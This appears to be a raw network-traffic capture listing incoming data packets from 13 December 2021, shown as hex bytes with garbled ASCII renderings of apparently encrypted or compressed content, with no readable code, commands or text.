                                                                                              2021-12-13 23:57:16 UTC5387INData Raw: 65 55 c1 d8 f5 7a c9 df 17 4d 07 8f f7 ae 5b 36 48 07 ee c8 6a 98 14 ee c6 7d fd 50 6c f5 0f ab 04 0f 7e 4a 67 21 0c 3a 77 ee d1 8d 06 f8 f5 d0 95 5c 37 3c 8d 96 1a 12 13 fb 81 7c df 5f c0 b0 74 20 e1 fa 92 86 63 b7 80 d7 47 11 67 b8 48 08 60 22 c0 ac 58 0e d6 a4 33 0c 15 05 d2 3c 66 c6 62 12 67 f9 01 23 b2 09 ff 92 b3 ef 48 79 9c 38 85 05 a0 98 f9 ce 27 83 6f 4f 1e cd 33 95 eb 06 ba b1 2f 81 20 5c ce b9 29 a7 e3 eb b4 3f f3 7b cd 0d 90 77 af ee 03 4d c6 f2 a9 c4 1b 83 f7 07 dd a1 bd 29 a6 09 7f 40 e9 a8 c0 0a 0a 3d 82 73 7c ad 6e d5 cb 57 41 ed d8 23 9d a3 3e 5a 57 3a 34 97 fb d3 f1 be be 4b ee 9c ca 46 c6 ea 70 ed bb 5b af 5d be 49 4a 4d d5 53 12 ca 3a b8 54 ac 98 41 d6 f2 b7 ef af 2b b6 81 e6 ea 2e 6d 4c 65 a8 1f 5a 4a e3 bd 67 4b 80 24 4e ea 7f ea 6f
                                                                                              Data Ascii: eUzM[6Hj}Pl~Jg!:w\7<|_t cGgH`"X3<fbg#Hy8'oO3/ \)?{wM)@=s|nWA#>ZW:4KFp[]IJMS:TA+.mLeZJgK$No
                                                                                              2021-12-13 23:57:16 UTC5388INData Raw: 0f db 50 64 00 92 db a7 7b ca f7 57 4a f1 4e 6f db c0 c4 ad 94 77 74 82 b1 9c 60 c7 63 61 6e 55 83 32 11 74 c8 e8 30 e2 4a ea 89 48 f2 b8 2e 69 12 94 de a2 bf 1e 31 05 8f 2f 53 d9 38 86 e9 8f 17 54 df ca 84 2a 24 e2 ed 08 89 bb f9 6b d8 74 ff 10 22 2b 6a a4 aa 90 a7 15 2f 11 0e 00 72 12 5a 9f 02 51 53 40 b1 c1 dc f3 06 be 05 23 db 5f 5c ae 8c 03 bd 90 90 c1 7b 0c d6 94 02 8f 62 c9 e9 7f 7b 43 5d 7a 7f 71 4c 4a 8c 8f e7 ac 1e 44 aa 9f 45 76 f6 7e 3c 18 e7 6a 5d 1e c6 7e 64 63 89 55 59 37 1c 36 b0 78 cb 36 5f 65 cd ac 3e 2f 35 ac fb a0 3b 4e 6c a6 ab 4b 1b a5 8c f2 7f ef b5 61 4a 8f 33 da 5a 80 7e 9d c6 ec 83 4f 72 8e df 07 47 ec a8 7a 46 d1 05 a8 90 c1 ed 27 1f 13 66 d7 1a 08 1b 8a eb df 14 a5 66 b4 5c d7 ed 1b 8f 5a dd 5b fc 7e 60 62 de 04 85 2b f6 8c 56
                                                                                              Data Ascii: Pd{WJNowt`canU2t0JH.i1/S8T*$kt"+j/rZQS@#_\{b{C]zqLJDEv~<j]~dcUY76x6_e>/5;NlKaJ3Z~OrGzF'ff\Z[~`b+V
                                                                                              2021-12-13 23:57:16 UTC5404INData Raw: d1 29 59 f6 7e 8c 7c 88 99 18 e1 a1 b6 7f 38 cf 48 23 ce 35 55 e8 66 2c cf f2 78 73 01 e7 17 4f be e1 ff 97 c4 76 24 33 e3 81 29 a3 06 16 16 3a a8 74 dc f3 94 e9 83 25 d7 7f dc a9 d1 fe ab e9 ab 08 0a 01 23 b0 b4 f0 d1 9c e4 3b ce b2 d6 24 fb 9f fa 65 51 2c 00 84 bc 1e 05 b4 68 b1 af e5 e2 a0 fb 16 70 a6 20 42 9d 24 9d 30 d5 e5 60 e0 88 ce 11 c0 f4 05 1b 8b 2a c2 fa 34 5e 22 37 16 be 05 34 5e 6f 62 78 88 ed a3 3a 54 0e e1 42 26 25 58 b8 92 23 51 44 a4 ec f9 7d 75 13 a1 7b 6e 20 c0 93 8c f7 32 06 58 6a 84 bc aa 85 54 ac 8e 4c 84 7c f4 78 3d 0d 07 d7 a6 01 e4 77 ff 19 1a 73 b7 db 74 07 9a 14 1c a3 cd 60 cf 36 d6 12 5a b7 61 18 c0 c8 1b 86 c3 a9 68 7c 76 11 7e 82 37 2a 95 99 e0 72 86 f5 26 7f c2 d1 a0 d6 4c b6 9a 31 24 de ea 9e 9d 06 83 c6 32 b3 66 e8 24 55
                                                                                              Data Ascii: )Y~|8H#5Uf,xsOv$3):t%#;$eQ,hp B$0`*4^"74^obx:TB&%X#QD}u{n 2XjTL|x=wst`6Zah|v~7*r&L1$2f$U
                                                                                              2021-12-13 23:57:16 UTC5405INData Raw: 0f f8 f6 5c a1 66 56 2d 98 23 13 eb c3 46 e9 2e 68 c7 79 4c 83 1a 3b 94 1f 77 60 11 e4 f1 e5 e3 0c a2 47 0c 5e 78 5b 9c 98 2d cd 90 3b b2 46 bc 14 b8 96 bb a3 d9 6f e8 2e 18 38 1a 00 8a 6d 41 a5 0f 04 f7 c9 45 08 1a 99 68 16 8f a0 39 4f 91 29 ad ad da 4c 95 f7 3f 05 ca d7 9a e9 47 11 89 c5 ec bc e2 1f 4b 93 78 65 c0 37 e2 a2 2a 20 a8 62 32 fe 33 83 d6 50 83 9f 27 83 cf 24 44 0a 01 7c 29 09 a3 10 42 f6 a1 ca 2f f9 25 bb e8 b6 9f e6 ed 51 87 21 f7 ee b2 83 ed d6 d2 fb 30 fc 24 30 e8 f1 1f 3d 75 0f 18 f3 6d 8a b8 7b d6 01 61 de e1 bb 35 5b 76 68 ae b1 b2 f9 73 12 9c 1e 2a ac 41 26 ee 72 73 c0 c8 e4 5b cf 9c 8b 06 eb de 0a 78 61 03 69 19 fe f6 9b 64 1b d1 20 6b 00 a4 f9 19 a2 d1 da e2 93 cc a4 98 52 9c a0 dd f8 70 68 3b 6e 17 e2 db b6 bc 8d 95 03 b1 fb 82 e2
                                                                                              Data Ascii: \fV-#F.hyL;w`G^x[-;Fo.8mAEh9O)L?GKxe7* b23P'$D|)B/%Q!0$0=um{a5[vhs*A&rs[xaid kRph;n
                                                                                              2021-12-13 23:57:16 UTC5421INData Raw: 9a 99 d3 62 89 71 fb 89 aa 3f 24 bf e4 6e 5e 08 78 9f 57 b5 8b f0 25 97 d8 1b ff 9c 16 4b e8 9d 0c 52 11 ab 13 03 22 b9 64 94 d0 0b 93 f1 9f 82 9f 66 73 64 04 d0 d7 9f dd 1f 4e a7 db 77 a5 2c 25 45 3f aa fe e1 30 24 37 ee bb e9 c2 2e 01 3c 99 0a 63 ff b2 32 f3 b3 a5 f0 c0 c5 d3 58 3f 5d c5 d1 ca 43 88 c4 4b 78 20 44 bb 65 53 0d 12 c0 20 c1 14 03 4e c9 85 60 e0 9d 9f 69 e1 e5 90 5f f3 94 0d 40 92 d6 a3 23 aa 33 56 18 57 8b 3b 22 91 bd 2d 38 31 b9 c6 52 70 37 37 87 d7 94 ff 9f d5 15 c1 75 e8 33 b4 b8 2f a4 b0 c9 cf 92 37 a4 27 80 2a 9d 05 30 b4 25 24 38 77 a4 ad b6 c7 5f 37 92 ab a9 f8 40 3e 48 07 8a 43 99 6a 86 ed 3f 10 b2 a8 3f f6 8a c0 3d 06 2d 0a 5e 4f 84 10 34 01 38 1e c4 a3 ed fd c9 e0 43 0f d3 0e ba 88 ea 63 a9 cd d8 bb 1f 3d 74 b2 36 77 9c 71 57 eb
                                                                                              Data Ascii: bq?$n^xW%KR"dfsdNw,%E?0$7.<c2X?]CKx DeS N`i_@#3VW;"-81Rp77u3/7'*0%$8w_7@>HCj??=-^O48Cc=t6wqW
                                                                                              2021-12-13 23:57:16 UTC5422INData Raw: 79 b2 87 bd 35 05 61 aa cb dd 16 30 a8 bb bc 7d 49 0a 73 0e 88 ec 1f 4f 35 fd 9f 97 a5 db 89 6c be 15 33 41 9d 1e a4 4d 2e f0 02 bf ad 11 c5 f5 e7 5e 2b ae 5b 81 57 4e 4f 8a fd b7 3d 21 bb 75 bf f2 ab 83 ea 18 64 5e 17 67 f1 2c 27 39 c1 13 75 03 a8 0b 72 e3 0d 68 04 21 01 05 2c f3 60 04 d5 6c bc 75 ea 33 7c 83 2a ac 40 25 46 0b 73 f4 db d9 65 84 c8 96 da 13 04 86 86 42 44 82 6e 63 ff c6 eb 8c 39 41 c0 6c 88 7d 73 10 28 d1 9f b8 0b 85 d4 22 78 33 af e5 95 fb 2f 15 00 74 94 93 b9 86 82 c9 6a c2 06 dd ff 38 4f bf 02 47 64 c5 48 63 93 37 34 4a 58 e3 e4 98 21 25 43 3d 74 55 90 cd 80 58 3f 91 c9 91 8c 30 04 f0 50 f5 44 9d b9 ee 22 fc 2c 5c ff c1 71 8b ba 2a 05 23 ca 39 71 8f 54 cb de 39 ec 93 b4 1f ec 40 69 bd 55 65 99 67 d0 43 3a ea 1d 12 47 a3 99 aa a4 58 05
                                                                                              Data Ascii: y5a0}IsO5l3AM.^+[WNO=!ud^g,'9urh!,`lu3|*@%FseBDnc9Al}s("x3/tj8OGdHc74JX!%C=tUX?0PD",\q*#9qT9@iUegC:GX
                                                                                              2021-12-13 23:57:16 UTC5438INData Raw: 5f 78 58 67 90 3a 7e 83 f7 d1 a0 bd 15 66 f6 7d 57 4b 7c 4f 94 80 9a 32 79 15 ad b8 e4 b5 f4 62 a1 5e 8d 3b fb 67 44 7e 57 d6 da 8a 3b 89 e6 e3 58 bd 47 d8 3d 79 7d 61 9f 49 be be a1 7c ed 61 32 5d 46 a6 81 c9 14 4a 3b 22 83 09 3e c4 ad 4e 26 a6 c8 ba 71 05 74 0c d6 86 b2 a7 47 d2 fb 14 96 f1 93 51 81 67 8e 05 a4 37 86 98 88 d6 5f 31 21 99 01 56 4a a5 7e c2 08 2c 53 e1 86 e6 70 cb 65 ea a6 50 67 5d 34 c2 04 0c cf 08 c9 ae b2 9f e7 ff 58 3f 97 cf 12 a0 86 1e d4 9f 3a 4c 3e 82 34 c4 ce 61 7d 0e 75 fa 31 5e 84 d9 bc f0 f8 c2 9f 69 20 16 a9 fc 20 12 a3 82 f7 b6 25 a3 a2 88 82 0a ee 20 b1 2e e5 a3 d8 ab 01 22 9d 4a 05 c0 cd d8 5b 3f 56 b0 6f cc 4d c6 54 2c 37 87 fc 0f 37 5d dd df 5a db f4 c9 b6 09 20 ed fe a4 a2 dd cb d1 40 f5 2e c8 73 2d f8 e0 4c b5 e7 24 b0
                                                                                              Data Ascii: _xXg:~f}WK|O2yb^;gD~W;XG=y}aI|a2]FJ;">N&qtGQg7_1!VJ~,SpePg]4X?:L>4a}u1^i % ."J[?VoMT,77]Z @.s-L$
                                                                                              2021-12-13 23:57:16 UTC5439INData Raw: b2 77 84 6b 69 dc c7 85 60 f3 22 47 e6 97 a8 5e 28 14 68 65 e4 ce 28 4a 1a 20 f8 14 01 62 b6 9b a9 40 76 fd 84 94 e7 cc 7c 38 f1 c3 77 ce d7 3d 66 c5 0e 56 e1 8d e9 35 df c4 57 46 b3 a6 f3 cb 1c a4 8d a6 f5 61 16 cf a9 fa 0a db 8b 50 15 73 55 10 38 27 e9 2e 54 55 9e 05 0d ba b9 de 7d cb 28 24 8f c0 12 0b 23 e2 46 a2 98 46 f9 fa 48 43 8f 2e 35 3b 16 eb 6f 1b bf 5a 6a 75 e2 05 f3 54 9a 8b da 1c 93 3c d8 5b 54 5a bb 93 7b 27 81 12 60 98 78 b8 36 14 49 02 4a 23 01 a5 1f 45 87 1f 6b 7e fc 38 64 23 6e 36 7f e8 74 0a fc 0d 00 29 f2 c0 49 f4 62 5f 87 82 52 27 a7 83 27 a9 f2 c8 ca 2e 02 94 d8 46 55 09 4c 91 bd e1 53 c8 c2 b4 47 49 c5 9d 2d fe 45 4c f1 1f 68 27 18 e8 d7 e3 a4 1a 09 88 f5 bc a2 0f ee 47 98 39 ef f8 78 1c d1 67 ba 0e 6c a5 09 81 14 1f 31 60 3e 58 88
                                                                                              Data Ascii: wki`"G^(he(J b@v|8w=fV5WFaPsU8'.TU}($#FFHC.5;oZjuT<[TZ{'`x6IJ#Ek~8d#n6t)Ib_R''.FULSGI-ELh'G9xgl1`>X
                                                                                              2021-12-13 23:57:16 UTC5455INData Raw: ed 01 9e f8 83 34 2f d1 9c 77 f8 10 f0 6f 1c 1f 43 f3 cf 27 f9 32 be 4f 3c ae 10 2f 8d 17 eb 90 97 98 d7 7e c6 79 05 1f 50 df a1 a6 94 51 a4 ea 4b 38 f6 04 7a 5e 65 a1 86 6a a8 f9 28 3d 3d f0 08 28 99 cc 04 cb 9a 3f 54 1a 47 3e 0e 9d 25 54 2a ad cb e5 18 9c fa 1a 9e 3d 0b 09 e0 91 f3 5d b0 14 c3 39 d2 f6 ae 69 28 7e ab 61 77 b7 19 d2 c0 1a 39 88 83 ba 2d 6d 26 bb 6c f7 f0 a0 3f ae 1e c8 a0 3f 9d 13 29 07 43 9e bd fc 34 a2 28 d7 2c 51 12 29 f4 35 d5 db 0e a3 d7 d0 74 95 d8 9b 6c 8f 7e 3c fa dd f6 1c 5f a6 9f f0 c8 29 a6 be 74 89 f6 ab 5e 93 25 30 53 19 eb d2 96 47 20 b4 5e f6 73 e9 4a 52 b9 aa 6b 1a 3b b7 b5 eb 80 0b f9 9d 37 ee d8 f9 7e 9a e0 95 5e 3f ac 2f 6c 71 58 31 7e 38 52 82 f0 3c 9b 85 4e 25 6b 32 4b 9e 41 85 de c5 4d bd 39 e7 95 fc af 9f ef a3 83
                                                                                              Data Ascii: 4/woC'2O</~yPQK8z^ej(==(?TG>%T*=]9i(~aw9-m&l??)C4(,Q)5tl~<_)t^%0SG ^sJRk;7~^?/lqX1~8R<N%k2KAM9
                                                                                              2021-12-13 23:57:16 UTC5456INData Raw: 66 91 e4 84 10 8b 3e 55 6f 6d e9 80 30 d5 7d 0f 01 f0 93 f2 6c fd 87 a3 b5 41 01 e1 8b 92 87 82 c1 f3 bc 72 18 92 19 db 47 6e c1 db 6f bd 19 10 bc 0d eb 67 1e 47 f5 b4 e3 a6 b0 b5 f0 27 95 fc a9 ab 23 0c 08 95 e8 b9 3f 6a 7b bc ea 7a ca 71 b3 38 3f 1c 06 2e 4d c5 dc 59 b8 6d eb 43 38 d2 78 33 03 a5 58 66 8b 56 d2 1b ed f8 6e 1d 8a b2 41 d0 57 aa 32 e0 a4 ce 88 f9 e1 4b 25 9f c2 94 32 42 2c 08 42 df ca 00 11 69 6e ec 72 f4 e0 78 ae 69 2e 25 23 de f3 06 ab 8a d9 e7 4b b8 43 c6 16 61 20 56 bb 03 47 fa f7 c6 f3 d7 20 7b bf ba d6 35 5c aa 46 98 ea 3d 3a 16 a4 48 ef 73 77 66 00 cc ed 0c 87 2b 3e 25 2f b0 d9 44 d9 70 79 cb 71 13 a9 92 0f db ce 0c 0c 19 02 bc a6 ec 6e 95 d2 99 b7 bd 24 29 5c cb 9b 4a 96 dc cc 31 fe ec e7 98 9a 5b 3d e8 3c 06 9a 38 dc f8 50 95 73
                                                                                              Data Ascii: f>Uom0}lArGnogG'#?j{zq8?.MYmC8x3XfVnAW2K%2B,Binrxi.%#KCa VG {5\F=:Hswf+>%/Dpyqn$)\J1[=<8Ps
                                                                                              2021-12-13 23:57:16 UTC5472INData Raw: c6 7e e8 f3 a3 c4 d7 11 22 32 14 20 ad aa f9 6f 42 35 bb cb 0a c7 4b 11 72 45 c7 c3 71 a6 66 1d 49 6a 4d 2f e5 29 75 44 fa ea 01 b0 8e 7b 8c 4a ad b6 0d 21 d4 b3 a7 16 ff 58 df 78 6b 6e 63 9b 9a ab 59 5c ec aa 1c af 1e e6 56 eb 3d 3b 6c 63 8a 41 46 c9 56 69 d7 73 9d 1f 1a ff f2 0a f0 e0 c5 e1 a9 ea 88 e5 67 a0 7a a7 2f 0f de c2 00 6d 06 74 f9 06 86 e4 92 ae 4d 20 1f 87 21 36 d6 02 f2 68 ad eb d2 b7 2e 0d 8f 46 8f ca 67 2d c7 09 4b 4c 27 2c 36 4a 07 13 84 a0 b4 91 c2 02 81 43 b2 9e 64 7b 96 e7 31 52 a4 e5 92 e6 ee 4c 81 cb e0 75 58 72 5a fd 1a fb e5 2a 83 fe bb e3 5a 23 6a 20 62 ad c2 f7 2d 13 ca ec 56 76 cc 8d 7a 63 00 86 6f c2 74 67 31 fb e0 ac bf c1 62 16 a9 c5 e2 50 8b ad f1 c6 67 45 2e b5 b5 95 ab 33 ad cf 28 50 b6 a7 17 a4 61 15 f0 89 67 cd bd 9f 9e
                                                                                              Data Ascii: ~"2 oB5KrEqfIjM/)uD{J!XxkncY\V=;lcAFVisgz/mtM !6h.Fg-KL',6JCd{1RLuXrZ*Z#j b-Vvzcotg1bPgE.3(Pag
                                                                                              2021-12-13 23:57:16 UTC5473INData Raw: 8e 5e c4 26 d9 6e ea be 2b fc f6 a7 10 c9 81 7b 28 84 17 5a b8 bc 03 20 99 5f 2f f9 56 3f 77 77 63 c4 a5 e1 02 11 be ee e8 1b 58 d0 b6 8d a1 cb 4b 68 3e 3d 37 22 d0 b2 b6 f8 dc c9 81 09 a1 e3 db 5d 41 1f d4 5c 9f ff 64 71 aa 23 fb d6 b0 3f 7c 9a 3d fe 66 1d fc 5b 37 0f 19 5e f4 30 5c 82 44 29 d3 90 c0 9a 70 36 d2 7d b5 b3 d5 21 0e 95 98 7c 4c 14 bb 0c 9b f5 a5 4f 3d 08 cc 64 2a 57 57 bb 7f cf a6 0e 0f 0c cc a9 70 3f 3e a2 d0 9e 20 ee 5c bd df 8a c0 88 f7 e8 74 ba 76 fd 87 d1 52 3f 03 b6 6b b6 4a 7e 6d f8 c1 fe 59 c5 f2 0a 36 5a fe e9 94 ce 2f 29 57 fb af 0a e0 dd 0f 98 0c f1 1a a0 81 43 5a 8d 8f 2a a9 38 08 f5 9a fe 0b e9 0f aa cf 7e 26 1d e9 93 29 be 5d 48 a2 07 3f 23 68 df 28 99 bb c3 7c 67 9d 85 78 93 cf d3 a3 ed 57 dc e8 1d 75 ae 90 1f bf 4b f5 00 78
                                                                                              Data Ascii: ^&n+{(Z _/V?wwcXKh>=7"]A\dq#?|=f[7^0\D)p6}!|LO=d*WWp?> \tvR?kJ~mY6Z/)WCZ*8~&)]H?#h(|gxWuKx
                                                                                              2021-12-13 23:57:16 UTC5489INData Raw: f2 31 47 22 06 45 37 28 12 bb 39 4d 9b a0 29 a0 f2 55 e7 2f 32 35 cb ed 32 2a e7 a3 45 8c 23 dc 6b 19 13 4c 88 15 b3 aa 95 37 39 2c aa 58 83 88 ab de 1d 78 9f 8c 96 17 ea 31 7f 3b 5b bc 2f 20 6f c2 3b ee 64 af 58 a6 19 55 9a d9 4a 26 7d 06 e2 75 62 1f c1 32 ea d4 f7 a0 6a a1 08 b5 a8 46 e0 9f ce fe 7d d7 95 0b 64 31 3d d2 de 03 62 82 bc 21 34 da 3e 24 c5 c7 ab fb 7b 31 a4 92 84 6f 10 de 9f cb 05 9b d3 9f ef 11 09 50 ab 29 f9 c2 c7 c1 7a 6b 34 78 c0 cc e1 9d 15 3d f4 45 e9 2c de 78 58 d4 18 db 56 28 1b ca 28 4d f0 da d5 aa 52 82 91 64 8c 6e 39 a1 c1 b5 97 cb f3 28 1e 3e 79 ab 10 9c cc 66 43 67 2f 52 39 d2 3c 3d 79 c2 9a ae a2 6c a0 ae a7 fc f0 4b a2 ba ba 2e cb f6 37 70 19 ca 9b 2f 67 b1 24 57 ed d8 d0 e6 ed 6f f9 6f 05 89 c7 6a 10 d2 19 f0 74 fa 1c 98 1b
                                                                                              Data Ascii: 1G"E7(9M)U/252*E#kL79,Xx1;[/ o;dXUJ&}ub2jF}d1=b!4>${1oP)zk4x=E,xXV((MRdn9(>yfCg/R9<=ylK.7p/g$Woojt
                                                                                              2021-12-13 23:57:16 UTC5490INData Raw: cf e5 50 73 3c c2 27 54 63 bf 83 e7 a8 cb f8 fc b0 d7 57 e8 99 23 6f 22 f4 99 99 63 ef b1 4c 6d aa 56 9e fa df f0 10 c2 d9 05 14 9b 90 1e f2 f5 2f 25 7b fb 67 67 81 bc 49 78 13 fa 8c 68 ac f0 eb e7 48 98 ba a1 27 a7 f5 64 e6 0c b3 ed 5c 31 b6 cb 55 6d 7f 9f e6 da a4 ff bc c2 0b 3a 14 2d 11 d5 e0 e2 ef f9 7e dc 1a 1d 85 d3 c7 06 4a 9e 03 c9 c9 32 98 8a 8d 74 f4 c0 cd d7 a2 a8 e4 3c de 34 e0 44 04 0c 32 32 12 a6 7c 41 15 57 9f 0b 3b a4 59 0c 4f 32 c6 bd d0 c2 30 ee 62 4a 65 96 42 61 56 1e 21 c6 9b bd 6e 07 d2 10 09 66 18 0c 2f 7b 49 31 bb b7 91 3e cf 7a 75 3e 82 f2 67 2b de e1 5b c0 1e 6b 18 e9 5d 75 b1 4c 51 24 7e e9 b1 40 86 ae 75 73 ee f5 4a 3f 08 8e 01 43 ed c0 de 36 89 e7 b6 30 e1 cc 69 52 8f 1e 2d 8f 84 7b 39 4f 95 77 c7 ce 1f 19 2c ed bb 22 3d 5f 7a
                                                                                              Data Ascii: Ps<'TcW#o"cLmV/%{ggIxhH'd\1Um:-~J2t<4D22|AW;YO20bJeBaV!nf/{I1>zu>g+[k]uLQ$~@usJ?C60iR-{9Ow,"=_z
                                                                                              2021-12-13 23:57:16 UTC5506INData Raw: 17 dc c8 53 9c 95 3e f5 20 37 01 5c 71 45 d5 1d 7b 9f 0f 15 17 29 c2 78 63 40 93 f5 e3 6b b5 98 16 7e a7 55 75 31 80 ed ba 97 09 5d f3 ef 55 70 be 3a 02 91 c2 c0 ea c3 72 b9 22 5d c3 74 0f 64 d1 3a 4e 8f 38 6e 4f df 02 5e 23 59 a5 94 9a 4b b8 2b 89 c6 fb bb 56 6b be b2 fb 8f 42 59 f7 d1 7d 44 a6 d1 40 4a a1 0d 30 72 96 c0 c6 7c 5b 39 08 ba dc bc b8 8c 0c 59 90 3d 97 f6 2c 21 aa 5d d6 95 7c 64 83 15 89 a6 77 d4 d6 f9 e1 11 2d ce 97 36 a8 8b 3d 0a 75 e5 2e 2d b9 bb 00 3e a0 d3 b0 d3 77 fa 3b 53 01 8e f3 a3 c0 e6 36 fe b7 8d 6c cb e4 b3 26 ae eb 3c 87 5f bd 16 5b b7 10 f3 d4 74 ef 00 48 4f c6 73 fd b8 8b 57 5f 13 47 1e e2 f0 bc 0b b6 a1 b3 a1 d7 16 d2 9f 01 a3 69 00 ee f7 42 3e e5 9e 75 5b c1 65 5b 38 03 39 66 9d 41 59 3a 26 59 dc a0 41 da 53 9d 8d 7b de 05
                                                                                              Data Ascii: S> 7\qE{)xc@k~Uu1]Up:r"]td:N8nO^#YK+VkBY}D@J0r|[9Y=,!]|dw-6=u.->w;S6l&<_[tHOsW_GiB>u[e[89fAY:&YAS{
                                                                                              2021-12-13 23:57:16 UTC5507INData Raw: 3c f1 38 0e fc 94 85 4d 28 d3 db a2 00 8f b4 4f c9 f8 6e c9 78 2e 7b a8 95 d4 a7 4e 95 97 1a e5 2a 71 22 9c dd 7e a2 04 e0 f9 43 3f db 4c 5d 15 00 1b e0 90 88 1f 7d b3 66 1c be ef 34 7f 7a d6 b8 7c ef ec 1f 3f ce d7 7d 45 7e 07 ca 33 b3 3f 5e 45 d3 2b ad aa ec 5b 6f b5 ef dd 16 1f 56 a8 d8 54 63 b3 21 75 db 10 34 d9 a5 38 77 07 ef 09 66 32 29 20 7c ce b2 5c bf 9a 8b a5 2a 61 2e 19 77 c7 d9 37 8c 25 57 a8 14 6c d1 55 4c f3 5b 2b 1f 1f b0 71 c6 14 d0 80 6e f7 76 78 78 8a 98 09 7f de 4b e4 f9 a5 6c 6e 66 2e 7b 78 33 5e 0a f0 88 23 c2 e3 51 89 12 cf ab 22 f2 58 47 a0 02 c0 4a 89 96 d8 81 5e e2 2b b2 3f 56 2e 47 cd 18 eb 00 a5 dd 99 2c c1 00 59 fe 28 59 1e 34 be 60 23 7a 38 d8 e7 71 e1 3d 91 88 a9 12 e2 3d 19 92 2e 83 f9 f1 0a 87 e4 a0 3d 3b a6 72 23 37 52 a7
                                                                                              Data Ascii: <8M(Onx.{N*q"~C?L]}f4z|?}E~3?^E+[oVTc!u48wf2) |\*a.w7%WlUL[+qnvxxKlnf.{x3^#Q"XGJ^+?V.G,Y(Y4`#z8q==.=;r#7R
                                                                                              2021-12-13 23:57:16 UTC5523INData Raw: 0e a9 3b 74 60 7b 0c 06 40 df b1 24 fd 99 71 02 e0 aa 78 c8 4b 7c c9 6b b7 41 57 97 e0 f2 b6 b3 5b fc 26 c9 c7 5d fe 5f a5 b9 ab 89 5d df a1 a1 70 cf 82 a2 4a 0f 0b fb df 1c aa b5 27 c7 a5 78 13 f3 8e 5f 4f 56 f0 9d f5 26 be dc c9 3f a8 6a 9f ef a1 a6 d4 81 1b be 8c 6d c0 5a 3a 04 8d 9e d9 98 e2 da 9f d2 08 32 3e f6 8d 73 b0 64 fe 63 fb 2c de f2 79 46 0c f5 16 8a 91 ec 41 a7 e2 ce 5e bd 2d 85 0a 47 69 98 c0 85 9a 4a b3 ad 8e e6 e1 fe 3c cc 8a 1e 25 4a 55 2d e4 22 11 34 3a 50 64 a6 a1 67 61 40 d1 4a 79 59 fb d1 d3 2d 44 49 06 db 5c 39 91 6a bc 9c 5d 26 73 38 17 6d 65 ea 19 01 e6 9c 61 c1 1e 48 7f ba 82 e6 96 11 f8 37 84 82 14 d8 c5 85 ba ec 1f 6c b2 fa 87 76 03 32 89 2e 60 a4 f1 3e 6c 0e 73 0e de ed d3 8b d7 67 76 8e b6 40 d6 b4 ad dd fa 2c 63 15 b4 f0 ff
                                                                                              Data Ascii: ;t`{@$qxK|kAW[&]_]pJ'x_OV&?jmZ:2>sdc,yFA^-GiJ<%JU-"4:Pdga@JyY-DI\9j]&s8meaH7lv2.`>lsgv@,c
                                                                                              2021-12-13 23:57:16 UTC5524INData Raw: 1f d9 35 97 0a 15 b8 41 48 9c 9c 75 ea 57 c6 93 42 65 c3 d8 ea 56 02 87 b1 85 5c 42 be 3c 4d 4e 0e e8 e4 e1 c1 9b d4 ae b3 46 12 08 76 0d 72 79 6f d8 ad 21 fe 4c d7 c1 02 c2 c1 00 09 f5 05 e9 c5 0b bb 12 b8 c0 9f 76 1b 34 0e 2d d3 ff 64 66 5d 51 58 a2 30 0e 48 86 63 30 ed 85 89 49 55 7f 67 68 4a 09 c2 8a 19 c9 fa e9 5c 31 66 81 46 1f 02 19 52 da 85 93 78 6b f5 3a 69 9d 55 c6 de 16 20 5d 23 22 b1 b4 be 3a 43 ac 9b 0c 4f 1d 81 41 a5 6c 4d c0 52 d0 44 ee b6 85 79 5b f6 c9 b8 55 a3 b9 77 7e 92 77 78 23 e1 30 b7 7d 58 f7 a8 3e bc 0f 68 a2 10 71 b5 c1 a6 27 c2 2e 4b 3f 3f 9b 6c f5 bd 3d dd 73 22 fb f0 42 d5 0c 71 41 9f 95 bf cb 1f 3f 40 65 d1 97 23 0c d1 ed 9f da 3c 86 59 5c 3b f8 f2 db 5c 6b 19 03 20 ff 05 3f 79 9b 8b a6 3d 66 27 34 4a c9 25 b7 64 5b 57 eb f8
                                                                                              Data Ascii: 5AHuWBeV\B<MNFvryo!Lv4-df]QX0Hc0IUghJ\1fFRxk:iU ]#":COAlMRDy[Uw~wx#0}X>hq'.K??l=s"BqA?@e#<Y\;\k ?y=f'4J%d[W
                                                                                              2021-12-13 23:57:16 UTC5540INData Raw: 0b b7 0c 8d 0d 93 85 a5 62 bd 95 72 59 56 dd 4a cc 49 c6 e0 fc bb cb 5d f7 e0 89 a4 ec 9a e8 f0 08 c1 97 ef 2d 70 a4 fe a7 07 20 e3 e8 5e a0 4a 9c 9c b2 a2 ee c9 ef 0b d4 88 ad 65 2b f8 4e 77 c0 e4 fd dc e0 42 ec c8 df b3 48 53 19 e1 f0 30 aa c4 e8 ce 90 79 93 b6 31 25 9d 96 c4 31 0c 68 c4 61 f1 64 86 95 4d 6e ac 2a ec b8 c5 3e 7e ee b7 fc 41 f1 25 c2 91 f6 2f 08 26 98 f1 9e 87 a9 d4 28 7e 41 72 80 02 da e2 75 50 15 e7 40 4e a1 85 80 f0 61 88 e6 df 4c ba 77 2b 9e 48 db 14 f6 23 22 3f b0 4d 17 e6 bc ce 42 09 b0 9b 91 a0 a6 45 61 28 c0 19 24 7c 30 29 36 13 4d ff b7 3b 64 0d 35 83 fb fa 04 eb 2a b1 32 ca f2 55 56 29 b6 52 b8 3e 55 f9 6c 46 67 10 11 b8 e1 08 c5 95 0b 98 98 f9 69 9e 3b 6e 66 b0 51 9e d0 1f e1 31 ad 57 e5 7b 47 66 43 94 15 a0 2a a5 0c 8c c8 0d
                                                                                              Data Ascii: brYVJI]-p ^Je+NwBHS0y1%1hadMn*>~A%/&(~AruP@NaLw+H#"?MBEa($|0)6M;d5*2UV)R>UlFgi;nfQ1W{GfC*
                                                                                              2021-12-13 23:57:16 UTC5541INData Raw: 67 84 d2 d4 d3 b8 32 d7 e9 80 3c 5d be 15 67 0c 9a db c5 e9 c6 5f 6b e3 e7 af df 1c c7 39 8d 89 3e a1 e7 bf 59 ad 47 45 65 2f 85 af e0 a3 93 24 17 52 b1 38 71 4e 57 ab aa 82 13 40 ad 6c 81 57 ad e4 f8 7a 25 3e bf b7 55 92 c5 b4 09 35 d4 20 b2 f8 f9 80 60 a7 e0 c9 47 2a c1 ea ba 95 71 0a d9 c8 22 6f c3 08 f3 42 41 99 30 89 22 6e 91 6b 52 64 aa 62 4a 95 4c 5d 10 49 8e 06 58 41 e4 9a 30 ed db f0 31 3e af ef 96 0a 77 d4 cc 4e 35 df 5c b3 89 70 6d 63 ba 34 58 e3 ec 6d 1f 88 60 81 f6 60 61 6a 4b 2d 4d 82 f0 72 c6 a2 fb 1b 77 f2 fb 00 ea a0 18 69 